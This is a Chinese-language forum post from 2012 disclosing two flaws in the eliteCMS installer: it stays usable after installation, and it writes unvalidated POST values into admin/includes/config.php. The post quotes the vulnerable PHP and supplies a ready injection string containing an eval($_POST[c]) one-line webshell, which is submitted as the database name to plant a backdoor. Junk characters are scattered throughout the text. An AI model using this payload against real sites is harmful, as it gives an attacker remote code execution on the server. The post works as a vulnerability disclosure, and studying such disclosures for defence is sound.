eliteCMS的安装程序安装结束后未作锁定,导致黑客可以通过访问安装程序地址进行重复安装, J5 C2 {6 K0 L
( _, x5 ?% p J另外一个漏洞是安装程序可以直接写入一句话到admin/includes/config.php
; _$ v' d c6 L$ l9 v: I/ P* d我们来看代码:4 H: M, `) \$ g: u( t( e
( B$ k! t" S& L
...0 y7 |' e9 j6 d
elseif ($_GET['step'] == "4") {1 ?; g% v; s1 S2 M' ?& M9 H
$file = "../admin/includes/config.php";( O+ D6 [; L- g' i# J4 O* F
$write = "<?php\n";+ P' j7 s0 N1 s
$write .= "/**\n";/ P+ c: ~. `: D1 k m
$write .= "*\n";0 _8 i, v0 ^, C. Q* Y5 w
$write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";
/ U$ |# T) E P0 m...略...2 v/ i3 a( \' ]( J) i$ G0 V
$write .= "*\n";
# d! z8 A" {5 A* i$ M8 l- g! ] $write .= "*/\n";7 N* Z: x' g4 a& ~8 ~/ q2 g
$write .= "\n";, A# s. r4 _) H& a
$write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";- j" I4 k; z; c% m1 l
$write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";
9 z& w# p2 d7 T! V $write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";
! S+ x& {& E8 i& j4 t3 X4 v/ _ $write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";( v; N: C3 s+ x$ c
$write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";0 T( o; \! T+ O6 e, }
$write .= "if (!\$connection) {\n";
7 Y$ g" P( F) t, Z $write .= " die(\"Database connection failed\" .mysql_error());\n";' O$ ~: @1 Z3 [: e0 I
$write .= " \n";
) y: C2 r% u3 B: G/ a3 w $write .= "} \n";
1 Y4 V; T& H; d. S8 I $write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n"; ], H3 t; k% E. y" n8 ?# j0 J
$write .= "if (!\$db_select) {\n";- X$ u3 ? H Q/ I
$write .= " die(\"Database select failed\" .mysql_error());\n";- n+ d7 S6 A6 z! l" b2 f+ D
$write .= " \n";
' u w4 H# i3 D4 q* S) P, [1 Z $write .= "} \n";
; l/ j. ?. ]; O! @6 l $write .= "?>\n";# x9 E9 w5 A) }( X! o* y" b. j
" `3 E9 v+ o$ F* G# Y. f
$writer = fopen($file, 'w');' |4 d& q0 Q' H( m
...
' L H) B I; s9 I+ b
+ ^1 _4 n$ H3 o) [在看代码:- e1 C/ p3 x9 J5 j5 H+ j
5 i9 n0 k! L* K8 b( j% v
$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];: e: Z$ C3 A+ d
$_SESSION['DB_NAME'] = $_POST['DB_NAME'];
2 Q J% } r ~$ j4 f& G" V' _- Q$_SESSION['DB_USER'] = $_POST['DB_USER'];
- C8 ?5 ~6 j$ t& |& z& m1 `$_SESSION['DB_PASS'] = $_POST['DB_PASS'];
/ M& p: o1 a/ n; T! c
, L, Y2 W, y, V! V3 M8 R: O6 _取值未作任何验证
3 i0 ^- `3 e5 ~! |如果将数据库名POST数据:
5 P9 C' j: ~/ g1 ?2 }
6 v9 X- q. @& A/ ?( j"?><?php eval($_POST[c]);?><?php* p) ~+ l1 M" ^+ [
; h4 D R" u; q) Y" O1 b将导致一句话后门写入/admin/includes/config.php
8 D' b4 [; f' B) ~ |
发表于 2012-11-18 13:59:27
收藏
支持
反对